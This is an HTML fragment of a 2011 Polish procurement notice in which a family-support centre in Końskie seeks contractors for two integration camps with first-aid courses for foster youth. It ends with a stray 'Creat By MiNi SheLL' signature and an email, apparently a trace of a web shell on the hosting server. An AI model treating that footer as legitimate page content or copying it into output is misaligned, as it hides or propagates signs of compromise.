<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3 do SIWZ,
- W przypadku wnoszenia oferty przez Wykonawców występujących wspólnie, Wykonawcy muszą złożyć oświadczenia i dokumenty, o których mowa w Rozdziale 5, z tym, że dokumenty wymienione w pkt 5.1.5  - 5.1.6 (i odpowiednio pkt 5.4) SIWZ należy złożyć dla każdego wykonawcy,
- Program zajęć dla każdej części przygotowany zgodnie z Załącznikiem nr 7 do SIWZ, uwzględniający wymagania zawarte w opisie przedmiotu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie:
-	terminów realizacji zamówienia - z zachowaniem ramowych terminów realizacji umowy określonych w rozdziale 3 SIWZ, w sytuacji wystąpienia zdarzeń natury losowej tj. zdarzeń nagłych, zewnętrznych, które są niezależne od Zamawiającego i Wykonawcy, które stanowią przeszkodę                   w realizacji umowy wg pierwotnego terminu, a których nie można było przewidzieć, ani im zapobiec (siła wyższa),
-	osób, które będą uczestniczyć w wykonywaniu zamówienia (wskazanych w ofercie Wykonawcy), pod warunkami określonymi w § 4 ust. 2 i 3 wzoru umowy,
-	wysokości wynagrodzenia Wykonawcy za realizacje przedmiotu umowy - w przypadkach określonych w § 5 ust. 5 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.konecki.wrota-swietokrzyskie.pl/web/quest/pcpr<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Konecki/Powiatowe Centrum Pomocy Rodzinie
ul. Stanisława Staszica 2, 26-200 Końskie
tel. 41-372-8406, fax: 41-372-5760
pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2011 godzina 10:00, miejsce: Powiat Konecki/Powiatowe Centrum Pomocy Rodzinie
ul. Stanisława Staszica 2, 26-200 Końskie
pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII promocja integracji społecznej, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie 10-dniowego motywacyjno-wzmacniającego Obozu Aktywnej Integracji dla wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 15-18 lat, połączonego z kursem udzielania pierwszej pomocy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie dla 26 wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 15-18 lat, 10 - dniowego motywacyjno-wzmacniającego Obozu Aktywnej Integracji połączonego z kursem udzielania pierwszej pomocy. Obóz powinien odbyć się na terenie Polski - w miejscowości górskiej lub położonej nad zbiornikiem wodnym (morze, jezioro). W trakcie trwania obozu powinien zostać przeprowadzony kurs udzielania pierwszej pomocy przedmedycznej zakończony zdobyciem certyfikatu oraz warsztaty motywacyjno-wzmacniające w ilości 5 godzin zegarowych. W grupie uczestników obozu będą                   4 osoby niepełnosprawne o następujących schorzeniach: astma, upośledzenie umysłowe, niepełnosprawność z ogólnego stanu zdrowia.
Wymagania kadrowe dotyczące organizacji obozów aktywnej integracji:
a) dotyczące Części 1 zamówienia:
-	w zakresie organizacji obozu - kierownik i 4 opiekunów_wychowawców posiadających kwalifikacje określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z póź. zm.) oraz posiadających doświadczenie w pracy z osobami niepełnosprawnymi, 
-	w zakresie organizacji warsztatów motywacyjno - wzmacniających - co najmniej               1 trener o wykształceniu wyższym (psycholog_pedagog_socjolog) z doświadczeniem         w prowadzeniu warsztatów  o przedmiotowej tematyce,
-	w zakresie opieki medycznej - całodobowa opieka pielęgniarska świadczona przez osoby posiadające odpowiednie kwalifikacje,
-	w zakresie kursu udzielania pierwszej pomocy - co najmniej 2 trenerów                               z uprawnieniami do prowadzenia kursów pierwszej pomocy przedmedycznej.
Wymogi Zamawiającego dotyczące realizacji przedmiotu zamówienia: 
A. Część 1:
a) Wykonawca zapewni transport uczestników na obóz z Końskich do ośrodka i w drodze powrotnej - autokarem wyposażonym w wc. Zamawiający zastrzega sobie prawo do kontroli pojazdu przed rozpoczęciem podróży, przez odpowiednie służby kontroli. W razie wykazania przez organy kontroli niesprawności autokaru, Wykonawca jest zobowiązany w ciągu                           1 godziny do podstawienia pojazdu sprawnego_zastępczego. Transport uczestników obozu powinien odbywać się w ciągu dnia,
b) Wykonawca zapewni uczestnikom obozu wyżywienie 4 razy dziennie (śniadanie, obiad, podwieczorek i kolacja), jak również suchy prowiant na drogę powrotną oraz na wszystkie ewentualne całodniowe wycieczki zorganizowane w czasie trwania obozu (soki, kanapki, owoce, słodycze). Jadalnia (stołówka) powinna być usytuowana na terenie obiektu, w którym zorganizowany jest obóz, o powierzchni umożliwiającej jednoczesne spożywanie posiłku przez wszystkich uczestników obozu,
c) Uczestnicy obozu będą zakwaterowani w pokojach dwu- lub trzyosobowych,                         o podwyższonym standardzie, z pełnym węzłem sanitarnym, z TV kablową i czajnikiem bezprzewodowym, w budynku dostosowanym do potrzeb osób niepełnosprawnych. Wykluczone jest zakwaterowanie uczestników obozu w domkach kempingowych,
d) Czas trwania kursu pierwszej pomocy - 8 godzin zegarowych dla każdego                                         z 26 uczestników obozu, natomiast czas trwania warsztatów motywacyjno - wzmacniających - 5 godzin zegarowych.
e) Miejsce warsztatów i kursu pierwszej pomocy - na terenie ośrodka, w którym będzie się odbywał obóz. Sala przeznaczona do prowadzenia warsztatów i kursu powinna być przystosowana do prowadzenia zajęć i mieć powierzchnię umożliwiającą aktywny udział uczestników w zajęciach,
f) Wykonawca zapewni uczestnikom obozu zajęcia integracyjne o charakterze kulturalno-rozrywkowym (wycieczkę autokarową z przewodnikiem, dyskoteki, ognisko, rozgrywki sportowe z nagrodami itp.). W przypadku organizacji wycieczki - Wykonawca zapewni nieodpłatny dla uczestników wstęp do zwiedzania obiektów,
g) Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczestników obozu, od momentu wyjazdu do czasu odbioru wszystkich osób z miejsca zbiórki po powrocie przez rodziców lub opiekunów prawnych,
h) Wykonawca zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy                    w trakcie obozu i kursu,
i) Wykonawca zapewni animatora dla uczestników obozu odpowiedzialnego za koordynację pobytu grupy na obozie, który przeprowadzi ewaluację realizacji zadania za pomocą ankiet ewaluacyjnych, zgodnie z przekazanym przez Zamawiającego wzorem,
j) Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników obozu,
k) W przypadku zorganizowania obozu w miejscowości uzdrowiskowej - Wykonawca poniesie koszty opłaty uzdrowiskowej_klimatycznej za wszystkich uczestników obozu,  
l) Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika obozu, obejmujące: dojazd uczestników obozu z miejscowości Końskie do miejsca odbywania się obozu, dojazd                z miejsca odbywania się obozu do miejscowości Końskie uczestników obozu oraz całodobowy 10 dniowy pobyt na obozie, na kwotę 10.000 zł. na jedną osobę,
ł) Wykonawca oznaczy miejsca, z których korzystać będą uczestnicy obozu poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego),
m) Wykonawca będzie prowadził dokumentację przebiegu obozu, warsztatów oraz kursu pierwszej pomocy, tj.: dziennika zajęć i listy obecności oraz dokumentację fotograficzną,
n) Wykonawca po zakończonym kursie udzielania pierwszej pomocy przedmedycznej wyda jego uczestnikom stosowne certyfikaty, których kserokopie wraz z imienną listą, przekaże Zamawiającemu,
o) Zamawiający zastrzega sobie prawo kontroli w zakresie realizacji przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 55.24.00.00-4, 63.50.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie 5-dniowego Obozu Aktywnej Integracji połączonego z warsztatami rozwoju własnego oraz kursem  udzielania pierwszej pomocy dla usamodzielnianych wychowanków rodzin zastępczych                 i placówek opiekuńczo - wychowawczych w wieku 18-25 lat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie dla 40 usamodzielnianych wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18 - 25 lat                     5 - dniowego Obozu Aktywnej Integracji połączonego z warsztatami rozwoju własnego oraz zdobyciem certyfikatu udzielania pierwszej pomocy przedmedycznej, zakończony zdobyciem certyfikatu, Obóz powinien odbyć się na terenie Polski -                w miejscowości górskiej lub położonej nad zbiornikiem wodnym (morze, jezioro).                 W trakcie trwania obozu powinien zostać przeprowadzony kurs udzielania pierwszej pomocy przedmedycznej, zakończony zdobyciem certyfikatu, jak również warsztaty rozwoju własnego w ilości 5 godzin zegarowych. W grupie uczestników obozu będzie 1 osoba niepełnosprawna poruszająca się na wózku inwalidzkim.
Wymagania kadrowe dotyczące organizacji obozów aktywnej integracji:
dotyczące Części 2 zamówienia:
-	w zakresie organizacji obozu - kierownik i 4 opiekunów_wychowawców posiadających kwalifikacje określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z póź. zm.) oraz                     1 opiekun dla uczestniczki poruszającej się na wózku inwalidzkim do całodobowej opieki, który obecny będzie także podczas transportu uczestników obozu,
-	w zakresie organizacji warsztatów rozwoju własnego - co najmniej 1 trener                          o wykształceniu wyższym (psycholog_pedagog_socjolog) z doświadczeniem                       w prowadzeniu warsztatów o przedmiotowej tematyce,
-	w zakresie kursu udzielania pierwszej pomocy - co najmniej 2 trenerów                               z uprawnieniami do prowadzenia kursów pierwszej pomocy przedmedycznej.
-	w zakresie opieki medycznej - całodobowa opieka pielęgniarska świadczona przez osoby posiadające odpowiednie kwalifikacje.
Wymogi Zamawiającego dotyczące realizacji przedmiotu zamówienia: 
a) Wykonawca zapewni transport uczestników na obóz z Końskich do ośrodka i w drodze powrotnej - pojazdem dostosowanym do przewozu osoby poruszającej się na wózku inwalidzkim. Pojazd powinien być wyposażony w WC. Zamawiający zastrzega sobie prawo do kontroli pojazdu przed rozpoczęciem podróży, przez odpowiednie służby kontroli. W razie wykazania przez organy kontroli niesprawności autokaru, Wykonawca jest zobowiązany              w ciągu 1 godziny do podstawienia pojazdu sprawnego/zastępczego. Transport uczestników obozu powinien odbywać się w ciągu dnia,
b) Wykonawca zapewni uczestnikom obozu wyżywienie 4 razy dziennie (śniadanie, obiad, podwieczorek i kolacja), jak również suchy prowiant na drogę powrotną oraz na wszystkie ewentualne całodniowe wycieczki zorganizowane w czasie trwania obozu (soki, kanapki, owoce, słodycze). Jadalnia (stołówka) powinna być usytuowana na terenie obiektu, w którym zorganizowany jest obóz, o powierzchni umożliwiającej jednoczesne spożywanie posiłku przez wszystkich uczestników obozu,
c) Uczestnicy obozu będą zakwaterowani w pokojach dwu- lub trzyosobowych,                         o podwyższonym standardzie, z pełnym węzłem sanitarnym, z TV kablową i czajnikiem bezprzewodowym, w budynku dostosowanym do potrzeb osób niepełnosprawnych. Wykluczone jest zakwaterowanie uczestników obozu w domkach kempingowych,
d) W przypadku niepełnosprawnej uczestniczki obozu, należy zakwaterować ją wraz                       z opiekunem w pokoju dwuosobowym z łazienką, dostosowanym do potrzeb osób poruszających się na wózkach inwalidzkich, 
e) Czas trwania kursu pierwszej pomocy - 8 godzin zegarowych dla każdego z 40 uczestników obozu, natomiast czas trwania warsztatów rozwoju własnego - 5 godzin zegarowych,
f) Miejsce warsztatów i kursu pierwszej pomocy - na terenie ośrodka, w którym będzie się odbywał obóz. Sala przeznaczona do prowadzenia warsztatów i kursu powinna być przystosowana do prowadzenia zajęć i mieć powierzchnię umożliwiającą aktywny udział uczestników w zajęciach,
g) Wykonawca zapewni uczestnikom obozu zajęcia integracyjne o charakterze kulturalno-rozrywkowym (wycieczkę autokarową z przewodnikiem, dyskoteki, ognisko, rozgrywki sportowe z nagrodami itp.). W przypadku organizacji wycieczki - Wykonawca zapewni nieodpłatny dla uczestników wstęp do zwiedzania obiektów,
h) Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczestników obozu, od momentu wyjazdu do czasu odbioru wszystkich osób z miejsca zbiórki po powrocie przez rodziców lub opiekunów prawnych,
i) Wykonawca zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy                    w trakcie obozu i kursu, 
j) Wykonawca zapewni animatora dla uczestników obozu odpowiedzialnego za koordynację pobytu grupy na obozie, który przeprowadzi ewaluację realizacji zadania za pomocą ankiet ewaluacyjnych, zgodnie z przekazanym przez Zamawiającego wzorem,
k) Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników obozu,
l) W przypadku zorganizowania obozu w miejscowości uzdrowiskowej - Wykonawca poniesie koszty opłaty uzdrowiskowej_klimatycznej za wszystkich uczestników obozu,  
ł) Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika obozu, obejmujące: dojazd uczestników obozu z miejscowości Końskie do miejsca odbywania się obozu, dojazd                z miejsca odbywania się obozu do miejscowości Końskie uczestników obozu oraz całodobowy 5 dniowy pobyt na obozie, na kwotę 10.000 zł na jedną osobę,
m) Wykonawca oznaczy miejsca, z których korzystać będą uczestnicy obozu poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego),
n) Wykonawca będzie prowadził dokumentację przebiegu obozu, warsztatów oraz kursu pierwszej pomocy, tj.: dziennika zajęć i listy obecności oraz dokumentację fotograficzną,
o) Wykonawca po zakończonym kursie udzielania pierwszej pomocy przedmedycznej wyda jego uczestnikom stosowne certyfikaty, których kserokopie wraz z imienną listą, przekaże Zamawiającemu,
p) Zamawiający zastrzega sobie prawo kontroli w zakresie realizacji przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 55.24.00.00-4, 63.50.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com